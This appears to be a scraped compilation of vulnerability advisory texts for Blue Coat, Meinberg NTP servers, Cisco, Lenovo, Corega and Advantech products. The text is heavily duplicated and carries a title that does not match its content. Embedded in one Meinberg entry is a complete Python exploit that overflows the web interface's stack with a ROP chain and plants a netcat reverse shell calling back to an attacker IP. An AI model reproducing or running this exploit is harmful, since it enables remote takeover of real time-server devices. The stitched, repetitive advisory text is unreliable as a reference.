Visilogic 9.8.30 are vulnerable

Blue Coat Advanced Secure Gateway 6.6, CacheFlow 3.4, ProxySG 6.5 and 6.6 allows remote attackers to bypass blocked requests, user authentication, and payload scanning. BlueCoatAdvancedSecureGateway, CacheFlow and ProxySG are products of BlueCoatSystems, USA. BlueCoatAdvancedSecureGateway is a secure web gateway device; CacheFlow is a network accelerator; ProxySG is a switch. BlueCoatAdvancedSecureGateway, CacheFlow, and ProxySG have security vulnerabilities. Multiple Blue Coat products are prone to a security-bypass vulnerability. Successfully exploiting this issue may allow an attacker to bypass certain security restrictions and perform unauthorized actions. The following products are vulnerable: Blue Coat ProxySG 6.5 and 6.6 Blue Coat ASG 6.6 Blue Coat CacheFlow 3.4

Multiple stack-based buffer overflows in the NTP time-server interface on Meinberg IMS-LANTIME M3000, IMS-LANTIME M1000, IMS-LANTIME M500, LANTIME M900, LANTIME M600, LANTIME M400, LANTIME M300, LANTIME M200, LANTIME M100, SyncFire 1100, and LCES devices with firmware before 6.20.004 allow remote attackers to obtain sensitive information, modify data, or cause a denial of service via a crafted parameter in a POST request. Meinberg NTP Time Server is prone to multiple privilege-escalation and stack-based buffer-overflow vulnerabilities. Remote attackers can exploit these issues to execute arbitrary code in the context of the application or gain elevated privileges. Other attacks are also possible. The following products are affected : Meinberg IMS-LANTIME M3000 Version 6.0 and prior Meinberg IMS-LANTIME M1000 Version 6.0 and prior Meinberg IMS-LANTIME M500 Version 6.0 and prior Meinberg LANTIME M900 Version 6.0 and prior Meinberg LANTIME M600 Version 6.0 and prior Meinberg LANTIME M400 Version 6.0 and prior Meinberg LANTIME M300 Version 6.0 and prior Meinberg LANTIME M200 Version 6.0 and prior Meinberg LANTIME M100 Version 6.0 and prior Meinberg SyncFire 1100 Version 6.0 and prior Meinberg LCES Version 6.0 and prior. Meinberg IMS-LANTIME M3000 etc. are all NTP time servers of German Meinberg company

The NTP time-server interface on Meinberg IMS-LANTIME M3000, IMS-LANTIME M1000, IMS-LANTIME M500, LANTIME M900, LANTIME M600, LANTIME M400, LANTIME M300, LANTIME M200, LANTIME M100, SyncFire 1100, and LCES devices with firmware before 6.20.004 allows remote authenticated users to obtain root privileges for writing to unspecified scripts, and consequently obtain sensitive information or modify data, by leveraging access to the nobody account. Meinberg NTP Time Server is prone to multiple privilege-escalation and stack-based buffer-overflow vulnerabilities. Remote attackers can exploit these issues to execute arbitrary code in the context of the application or gain elevated privileges. Other attacks are also possible. The following products are affected : Meinberg IMS-LANTIME M3000 Version 6.0 and prior Meinberg IMS-LANTIME M1000 Version 6.0 and prior Meinberg IMS-LANTIME M500 Version 6.0 and prior Meinberg LANTIME M900 Version 6.0 and prior Meinberg LANTIME M600 Version 6.0 and prior Meinberg LANTIME M400 Version 6.0 and prior Meinberg LANTIME M300 Version 6.0 and prior Meinberg LANTIME M200 Version 6.0 and prior Meinberg LANTIME M100 Version 6.0 and prior Meinberg SyncFire 1100 Version 6.0 and prior Meinberg LCES Version 6.0 and prior. Meinberg IMS-LANTIME M3000 etc. are all NTP time servers of German Meinberg company. An elevation of privilege vulnerability exists in the NTP time-server interface of several Meinberg products

Cross-site scripting (XSS) vulnerability in the management interface in Cisco Unified Contact Center Enterprise through 10.5(2) allows remote attackers to inject arbitrary web script or HTML via a crafted URL, aka Bug ID CSCux59650. The component provides intelligent contact routing, call processing, network-to-desktop telephony integration (CTI), and multi-channel contact management capabilities over the IP infrastructure

Stack-based buffer overflow in the NTP time-server interface on Meinberg IMS-LANTIME M3000, IMS-LANTIME M1000, IMS-LANTIME M500, LANTIME M900, LANTIME M600, LANTIME M400, LANTIME M300, LANTIME M200, LANTIME M100, SyncFire 1100, and LCES devices with firmware before 6.20.004 allows remote attackers to obtain sensitive information, modify data, or cause a denial of service via a crafted parameter in a POST request. Meinberg NTP Time Server is prone to multiple privilege-escalation and stack-based buffer-overflow vulnerabilities. Remote attackers can exploit these issues to execute arbitrary code in the context of the application or gain elevated privileges. Other attacks are also possible. The following products are affected : Meinberg IMS-LANTIME M3000 Version 6.0 and prior Meinberg IMS-LANTIME M1000 Version 6.0 and prior Meinberg IMS-LANTIME M500 Version 6.0 and prior Meinberg LANTIME M900 Version 6.0 and prior Meinberg LANTIME M600 Version 6.0 and prior Meinberg LANTIME M400 Version 6.0 and prior Meinberg LANTIME M300 Version 6.0 and prior Meinberg LANTIME M200 Version 6.0 and prior Meinberg LANTIME M100 Version 6.0 and prior Meinberg SyncFire 1100 Version 6.0 and prior Meinberg LCES Version 6.0 and prior. Meinberg IMS-LANTIME M3000 etc. are all NTP time servers of German Meinberg company. #!/usr/bin/python # # EDB Note: Source ~ https://github.com/securifera/CVE-2016-3962-Exploit # EDB Note: More info ~ https://www.securifera.com/blog/2016/07/17/time-to-patch-rce-on-meinberg-ntp-time-server/ # # 271 - trigger notifications # 299 - copy user defined notifications # Kernel Version: 2.6.15.1 # System Version: 530 # Lantime configuration utility 1.27 # ELX800/GPS M4x V5.30p import socket import struct import telnetlib import sys import time if len(sys.argv) < 3: print "[-] <Host> <Callback IP> " exit(1) host = sys.argv[1] callback_ip = sys.argv[2] print "[+] exploiting Meinburg M400" port = 80 ################################################################### # # Copy user_defined_notification to /www/filetmp # Append reverse shell string to /file/tmp # csock = socket.socket( socket.AF_INET, socket.SOCK_STREAM) csock.connect ( (host, int(port)) ) param = "A" * 0x2850 resp = "POST /cgi-bin/main HTTP/1.1\r\n" resp += "Host: " + host + "\r\n" resp += "User-Agent: Mozilla/5.0\r\n" resp += "Accept: text/html\r\n" resp += "Accept-Language: en-US\r\n" resp += "Connection: keep-alive\r\n" resp += "Content-Type: application/x-www-form-urlencoded\r\n" system = 0x80490B0 exit = 0x80492C0 some_str = 0x850BDB8 #must have a listener setup to receive the callback connection on ip 192.168.60.232 # i.e. nc -v -l -p 4444 command = 'cp /mnt/flash/config/user_defined_notification /www/filetmp; echo "{rm,/tmp/foo};{mkfifo,/tmp/foo};/bin/bash</tmp/foo|{nc,' + callback_ip +'0,4444}>/tmp/foo;" >> /www/filetmp' msg = "button=" + "A"*10028 msg += struct.pack("I", system ) msg += struct.pack("I", exit ) msg += struct.pack("I", some_str ) msg += command + "\x00" resp += "Content-Length: " + str(len(msg)) + "\r\n\r\n" resp += msg csock.send(resp) csock.close() time.sleep(1) ################################################################### # # Copy /www/filetmp to user_defined_notification # csock = socket.socket( socket.AF_INET, socket.SOCK_STREAM) csock.connect ( (host, int(port)) ) param = "A" * 0x2850 resp = "POST /cgi-bin/main HTTP/1.1\r\n" resp += "Host: " + host + "\r\n" resp += "User-Agent: Mozilla/5.0\r\n" resp += "Accept: text/html\r\n" resp += "Accept-Language: en-US\r\n" resp += "Connection: keep-alive\r\n" resp += "Content-Type: application/x-www-form-urlencoded\r\n" send_cmd = 0x807ED88 system = 0x80490B0 exit = 0x80492C0 some_str = 0x850BDB8 ret = 0x804CE65 #stack pivot stack_pivot = 0x8049488 msg = "button=" + "A" * 9756 msg += "B" * 28 msg += struct.pack("I", 0x7FFEE01A ) # ebp msg += struct.pack("I", 0x0804ce64 ) # pop eax ; ret msg += struct.pack("I", some_str - 0x100 ) # some place msg += struct.pack("I", 0x080855cc ) # add dword ptr [eax + 0x60], ebp ; ret msg += struct.pack("I", 0x080651d4 ) # inc dword ptr [ebx + 0x566808ec] ; ret msg += struct.pack("I", ret ) * (71/4) msg += struct.pack("I", send_cmd ) msg += struct.pack("I", exit ) msg += struct.pack("I", 0x80012111 ) # [eax + 0x60] msg += struct.pack("I", some_str ) # buffer msg += struct.pack("I", 0xffffffff ) # count msg += "E" * 120 msg += struct.pack("I", 0xB1E8B434 ) # ebx msg += struct.pack("I", some_str - 100 ) # esi msg += struct.pack("I", some_str - 100 ) # edi msg += struct.pack("I", some_str - 0x100 ) # ebp msg += struct.pack("I", stack_pivot ) # mov esp, ebp ; ret msg += "A" * 100 resp += "Content-Length: " + str(len(msg)) + "\r\n\r\n" resp += msg csock.send(resp) csock.close time.sleep(1) ################################################################### # # Trigger reverse shell # csock = socket.socket( socket.AF_INET, socket.SOCK_STREAM) csock.connect ( (host, int(port)) ) param = "A" * 0x2850 resp = "POST /cgi-bin/main HTTP/1.1\r\n" resp += "Host: " + host + "\r\n" resp += "User-Agent: Mozilla/5.0\r\n" resp += "Accept: text/html\r\n" resp += "Accept-Language: en-US\r\n" resp += "Connection: keep-alive\r\n" resp += "Content-Type: application/x-www-form-urlencoded\r\n" send_cmd = 0x807ED88 system = 0x80490B0 exit = 0x80492C0 some_str = 0x850BDB8 ret = 0x804CE65 #stack pivot stack_pivot = 0x8049488 msg = "button=" + "A" * 9756 msg += "B" * 28 msg += struct.pack("I", 0x7FFEE01A ) # ebp msg += struct.pack("I", 0x0804ce64 ) # pop eax ; ret msg += struct.pack("I", some_str - 0x100 ) # some place msg += struct.pack("I", 0x080855cc ) # add dword ptr [eax + 0x60], ebp ; ret msg += struct.pack("I", 0x080651d4 ) # inc dword ptr [ebx + 0x566808ec] ; ret msg += struct.pack("I", ret ) * (71/4) msg += struct.pack("I", send_cmd ) msg += struct.pack("I", exit ) msg += struct.pack("I", 0x800120f5 ) # [eax + 0x60] msg += struct.pack("I", some_str ) # buffer msg += struct.pack("I", 0xffffffff ) # count msg += "E" * 120 msg += struct.pack("I", 0xB1E8B434 ) # ebx msg += struct.pack("I", some_str - 100 ) # esi msg += struct.pack("I", some_str - 100 ) # edi msg += struct.pack("I", some_str - 0x100 ) # ebp msg += struct.pack("I", stack_pivot ) # mov esp, ebp ; ret msg += "A" * 100 resp += "Content-Length: " + str(len(msg)) + "\r\n\r\n" resp += msg csock.send(resp) csock.close() time.sleep(1) print "[+] cleaning up" ################################################################### # # Kill all mains that are hung-up # csock = socket.socket( socket.AF_INET, socket.SOCK_STREAM) csock.connect ( (host, int(port)) ) param = "A" * 0x2850 resp = "POST /cgi-bin/main HTTP/1.1\r\n" resp += "Host: " + host + "\r\n" resp += "User-Agent: Mozilla/5.0\r\n" resp += "Accept: text/html\r\n" resp += "Accept-Language: en-US\r\n" resp += "Connection: keep-alive\r\n" resp += "Content-Type: application/x-www-form-urlencoded\r\n" system = 0x80490B0 exit = 0x80492C0 some_str = 0x850BDB8 command = 'killall main' msg = "button=" + "A"*10028 msg += struct.pack("I", system ) msg += struct.pack("I", exit ) msg += struct.pack("I", some_str ) msg += command + "\x00" resp += "Content-Length: " + str(len(msg)) + "\r\n\r\n" resp += msg csock.send(resp) csock.close() print "[+] enjoy"

Lenovo BIOS EFI Driver allows local administrators to execute arbitrary code with System Management Mode (SMM) privileges via unspecified vectors. Multiple Lenovo Products are prone to a local code-execution vulnerability. Lenovo BIOS EFI Driver is a set of EFI (Extensible Firmware Interface) drivers used in BIOS by China Lenovo (Lenovo). A security vulnerability exists in the Lenovo BIOS EFI Driver

Corega CG-WLBARGL devices allow remote authenticated users to execute arbitrary commands via unspecified vectors. CG-WLBARGL provided by Corega Inc is a wireless LAN router. CG-WLBARGL contains a command injection vulnerability. Ohji Kashiwazaki of Global Security Experts Inc. reported this vulnerability to IPA. JPCERT/CC coordinated with the developer under Information Security Early Warning Partnership.An arbitrary command may be executed by an authenticated attacker. CG-WLBARGL is prone to an unspecified command-injection vulnerability because it fails to adequately sanitize user-supplied input. A security vulnerability exists in the Corega CG-WLBARGL device

Corega CG-WLBARAGM devices allow remote attackers to cause a denial of service (reboot) via unspecified vectors. CG-WLBARAGM provided by Corega Inc is a wireless LAN router. CG-WLBARAGM contains a denial-of-service (DoS) vulnerability. Yuji Ukai of FFRI, Inc reported this vulnerability to IPA. JPCERT/CC coordinated with the developer under Information Security Early Warning Partnership.An unauthenticated remote attacker may cause the product to reboot. A denial of service vulnerability exists in CoregaCG-WLBARAGM

The Wi-Fi Protected Setup (WPS) implementation on Corega CG-WLR300GNV and CG-WLR300GNV-W devices does not restrict the number of PIN authentication attempts, which makes it easier for remote attackers to obtain network access via a brute-force attack. CG-WLR300GNV and CG-WLR300GNV-W provided by Corega Inc are wireless LAN routers. The WPS functionality in CG-WLR300GNV Series does not limit PIN authentication attempts, making it susceptible to brute force attacks. Takeshi Okamoto of Kanagawa Institute of Technology and Takaaki Minegishi reported this vulnerability to IPA. JPCERT/CC coordinated with the developer under Information Security Early Warning Partnership.An unauthenticated attacker within wireless range of the device may perform a brute force attack to recover the PIN. Using the recovered PIN, the attacker may gain access to the network. A permission acquisition vulnerability exists in CoregaCG-WLR300GNV and CG-WLR300GNV-W due to the failure of the program to limit the number of authentication requests. CG-WLR300GNV Series routers are prone to an information-disclosure vulnerability. An attacker can exploit this issue to bypass certain security restrictions and aid in brute-force attacks; other attacks may also be possible

Cisco AsyncOS 9.7.0-125 on Email Security Appliance (ESA) devices allows remote attackers to bypass intended spam filtering via crafted executable content in a ZIP archive, aka Bug ID CSCuy39210. Vendors have confirmed this vulnerability Bug ID CSCuy39210 It is released as. Supplementary information : CWE Vulnerability type by CWE-254: Security Features ( Security function ) Has been identified. http://cwe.mitre.org/data/definitions/254.htmlBy a third party ZIP Spam filtering can be bypassed through the crafted and crafted content of the archive. Successfully exploiting this issue may allow an attacker to bypass certain security restrictions and perform unauthorized actions

Unspecified ActiveX controls in Advantech WebAccess before 8.1_20160519 allow remote authenticated users to obtain sensitive information or modify data via unknown vectors, related to the INTERFACESAFE_FOR_UNTRUSTED_CALLER (aka safe for scripting) flag. Advantech WebAccess (formerly known as BroadWin WebAccess) is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. An arbitrary code execution vulnerability exists in Advantech WebAccess prior to 8.1_20160519, which was caused by a program that marked an unsafe ActiveX control as safe-for-scripting. An attacker could exploit this vulnerability to insert and execute arbitrary code. Advantech WebAccess is prone to the following security vulnerabilities: 1. A local buffer-overflow vulnerability Local attackers can exploit these issues to perform unauthorized actions and crash the affected application; denying service to legitimate users. Due to the nature of these issues, code-execution may be possible but this has not been confirmed. Versions prior to Advantech WebAccess 8.1_20160519 are vulnerable